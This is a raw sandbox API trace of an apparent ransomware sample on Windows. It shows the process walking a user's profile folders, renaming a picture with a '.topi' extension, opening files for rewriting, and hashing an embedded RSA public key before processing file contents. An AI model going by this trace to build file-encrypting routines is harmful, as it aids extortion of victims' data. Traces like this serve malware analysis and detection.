[0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9648 [0095.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9660 [0095.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.749] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZxHeC1KCTrrL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zxhec1kctrrl.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZxHeC1KCTrrL.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zxhec1kctrrl.bmp.topi")) returned 1 [0095.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.749] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.750] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41272ed0, ftCreationTime.dwHighDateTime=0x1d5c5bf, ftLastAccessTime.dwLowDateTime=0xfaca7c10, ftLastAccessTime.dwHighDateTime=0x1d5b8f5, ftLastWriteTime.dwLowDateTime=0xfaca7c10, ftLastWriteTime.dwHighDateTime=0x1d5b8f5, nFileSizeHigh=0x0, nFileSizeLow=0x6271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxHeC1KCTrrL.bmp", cAlternateFileName="ZXHEC1~1.BMP")) returned 0 [0095.750] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0095.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0095.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.751] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.751] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.751] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0095.751] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.751] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.751] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.751] PathFindFileNameW (pszPath="") returned="" [0095.751] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.751] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.751] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0095.751] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.751] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.751] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.751] PathFindFileNameW (pszPath="") returned="" [0095.751] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.751] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0095.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.752] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.752] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.752] PathFindFileNameW (pszPath="") returned="" [0095.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0095.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.752] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0095.752] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0095.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0095.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.752] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.752] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0095.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.752] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.753] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.753] PathFindFileNameW (pszPath="") returned="" [0095.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0095.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.753] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0095.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0095.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.753] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0095.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0095.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.753] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0095.753] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0095.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0095.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.754] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.754] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0095.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.754] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.754] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.754] PathFindFileNameW (pszPath="") returned="" [0095.754] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.754] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0095.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.754] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.754] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.754] PathFindFileNameW (pszPath="") returned="" [0095.755] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.755] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0095.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.755] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.755] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.755] PathFindFileNameW (pszPath="") returned="" [0095.755] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.755] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0095.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.755] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.755] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.755] PathFindFileNameW (pszPath="") returned="" [0095.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3uyQN.mp4") returned=".mp4" [0095.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3uyQN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\3uyqn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.756] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=41101) returned 1 [0095.756] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.758] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa067, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.759] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.759] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.759] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xa08d, lpOverlapped=0x0) returned 1 [0095.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.760] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.761] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.761] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.761] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.761] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.761] GetLastError () returned 0x0 [0095.761] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.761] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.761] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.761] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.761] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa090) returned 0x99f72d8 [0095.761] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2100 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2148 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9660 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9678 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.762] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9660 | out: hHeap=0x680000) returned 1 [0095.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9678 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9660 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 